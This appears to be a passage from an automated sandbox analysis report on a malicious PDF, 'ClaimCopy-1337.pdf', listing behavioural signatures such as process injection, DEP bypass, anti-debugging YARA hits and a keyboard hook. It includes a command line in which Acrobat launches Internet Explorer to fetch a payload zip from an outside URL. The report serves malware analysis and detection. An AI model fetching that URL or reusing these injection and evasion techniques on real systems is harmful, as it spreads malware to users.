file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6437A540-BBC.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\old_GPUCache_000
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6437A540-9AC.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6437A55B-848.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6437A56F-CA0.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2

Creates a shortcut to an executable file (3 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef60000 process_handle: 0xffffffff	1	0	0

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c

Yara rule detected in process memory (26 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1652 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome "http://krishikannada.com/blo/hf98fh92.zip"
cmdline	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 13, 2023, 9:47 a.m.	process_identifier: 3612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772e1000 process_handle: 0x0000000000000050	1	0	0
NtProtectVirtualMemory April 13, 2023, 9:47 a.m.	process_identifier: 3612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772b7000 process_handle: 0x0000000000000050	1	0	0

Potential code injection by writing to the memory of another process (9 events)

Time & API	Arguments	Status	Return
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: base_address: 0x000000013f5522b0 process_identifier: 3612 process_handle: 0x000000000000004c	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: base_address: 0x000000013f560d88 process_identifier: 3612 process_handle: 0x000000000000004c	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: I»`#R?Aÿã base_address: 0x00000000772e1590 process_identifier: 3612 process_handle: 0x0000000000000050	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: HH base_address: 0x000000013f560d78 process_identifier: 3612 process_handle: 0x000000000000004c	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: I» R?Aÿã base_address: 0x00000000772b7a90 process_identifier: 3612 process_handle: 0x0000000000000050	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: HH base_address: 0x000000013f560d70 process_identifier: 3612 process_handle: 0x000000000000004c	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: ÏT base_address: 0x000000013f500108 process_identifier: 3612 process_handle: 0x000000000000004c	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: .w@.w .w@.w.w°.w +wàT+w 3.w.wÀ´)w`,.wÀ,wöw Y.w2.wV.w°4w+wR.w +wQ.wÂ+w ?,wP+w°T+wàt+wð,wÐ1.wwÐO*w`ê-wÐæ-wÐæ-wÐ..w base_address: 0x000000013f55aae8 process_identifier: 3612 process_handle: 0x000000000000004c	1	1
WriteProcessMemory April 13, 2023, 9:47 a.m.	buffer: base_address: 0x000000013f560c78 process_identifier: 3612 process_handle: 0x000000000000004c	1	1

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW April 13, 2023, 9:47 a.m.	thread_identifier: 0 callback_function: 0x00000000ffd0ae10 hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00000000ffc60000	1	1376973	0

One or more non-whitelisted processes were created (7 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe"
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
parent_process	acrord32.exe	martian_process	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome "http://krishikannada.com/blo/hf98fh92.zip"
parent_process	acrord32.exe	martian_process	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043

Appends a known multi-family ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\pj2g99sx.default-release\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (14 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1652 resumed a thread in remote process 1844
Process injection	Process 1236 resumed a thread in remote process 3004
Process injection	Process 1236 resumed a thread in remote process 2476
Process injection	Process 1236 resumed a thread in remote process 2120
Process injection	Process 1236 resumed a thread in remote process 3232
Process injection	Process 1236 resumed a thread in remote process 3532
Process injection	Process 3532 resumed a thread in remote process 3612
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 1844	1	0	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x0000000000000b8c suspend_count: 1 process_identifier: 3004	1	0	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000b94 suspend_count: 1 process_identifier: 2476	1	0	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000b20 suspend_count: 1 process_identifier: 2120	1	0	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000564 suspend_count: 1 process_identifier: 3232	1	0	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x00000000000005c4 suspend_count: 1 process_identifier: 3532	1	0	0
NtResumeThread April 13, 2023, 9:47 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 3612	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 65 events)

Time & API	Arguments	Status	Return
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x000002cc suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 2276 thread_handle: 0x00000324 process_identifier: 2292 current_directory: filepath: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe track: 1 command_line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043 filepath_r: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe stack_pivoted: 0 creation_flags: 1040 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 1 process_handle: 0x0000032c	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x0000038c suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 1608 thread_handle: 0x00000340 process_identifier: 1620 current_directory: filepath: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe track: 1 command_line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043 filepath_r: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe stack_pivoted: 0 creation_flags: 1040 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 1 process_handle: 0x00000348	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 1604 thread_handle: 0x0000053c process_identifier: 1652 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome "http://krishikannada.com/blo/hf98fh92.zip" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000528	1	1
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 2692 thread_handle: 0x00000340 process_identifier: 2520 current_directory: filepath: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe track: 1 command_line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043 filepath_r: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe stack_pivoted: 0 creation_flags: 1040 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 1 process_handle: 0x00000348	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 2828 thread_handle: 0x0000051c process_identifier: 2852 current_directory: filepath: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe track: 1 command_line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043 filepath_r: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe stack_pivoted: 0 creation_flags: 1040 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 1 process_handle: 0x00000534	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x0000051c suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 2980 thread_handle: 0x00000350 process_identifier: 2984 current_directory: filepath: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe track: 1 command_line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043 filepath_r: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe stack_pivoted: 0 creation_flags: 1040 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 1 process_handle: 0x00000534	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000350 suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 964 thread_handle: 0x00000350 process_identifier: 792 current_directory: filepath: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe track: 1 command_line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043 filepath_r: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe stack_pivoted: 0 creation_flags: 1040 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 1 process_handle: 0x00000534	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000350 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000051c suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x00000548 suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 1880 thread_handle: 0x00000360 process_identifier: 1844 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1652 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000364	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 1844	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000438 suspend_count: 1 process_identifier: 1652	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 1652	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 1844	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 1844	1	0
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 1844	1	0
CreateProcessInternalW April 13, 2023, 9:45 a.m.	thread_identifier: 3044 thread_handle: 0x0000000000000b8c process_identifier: 3004 current_directory: C:\Program Files (x86)\Google\Chrome\Application filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000b20	1	1
NtResumeThread April 13, 2023, 9:45 a.m.	thread_handle: 0x0000000000000b8c suspend_count: 1 process_identifier: 3004	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 2456 thread_handle: 0x0000000000000b94 process_identifier: 2476 current_directory: C:\Program Files (x86)\Google\Chrome\Application filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000006ac	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000b94 suspend_count: 1 process_identifier: 2476	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 1044 thread_handle: 0x0000000000000b20 process_identifier: 2120 current_directory: C:\Program Files (x86)\Google\Chrome\Application filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003a0	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000b20 suspend_count: 1 process_identifier: 2120	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 3236 thread_handle: 0x0000000000000564 process_identifier: 3232 current_directory: C:\Program Files (x86)\Google\Chrome\Application filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000598	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000564 suspend_count: 1 process_identifier: 3232	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 3536 thread_handle: 0x00000000000005c4 process_identifier: 3532 current_directory: C:\Program Files\Mozilla Firefox filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000005c0	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x00000000000005c4 suspend_count: 1 process_identifier: 3532	1	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000078 suspend_count: 1 process_identifier: 3004	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 1020 thread_handle: 0x00000000000000c0 process_identifier: 1968 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000c4	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x00000000000000f0 suspend_count: 1 process_identifier: 1968	1	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000078 suspend_count: 1 process_identifier: 2476	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 3020 thread_handle: 0x00000000000000c0 process_identifier: 3024 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000c4	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x00000000000000dc suspend_count: 1 process_identifier: 3024	1	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000078 suspend_count: 1 process_identifier: 2120	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 2276 thread_handle: 0x00000000000000c0 process_identifier: 1596 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000c4	1	1
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x00000000000000d4 suspend_count: 1 process_identifier: 1596	1	0
NtResumeThread April 13, 2023, 9:46 a.m.	thread_handle: 0x0000000000000078 suspend_count: 1 process_identifier: 3232	1	0
CreateProcessInternalW April 13, 2023, 9:46 a.m.	thread_identifier: 3380 thread_handle: 0x00000000000000c0 process_identifier: 3376 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000c4	1	1

ClaimCopy-1337.pdf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All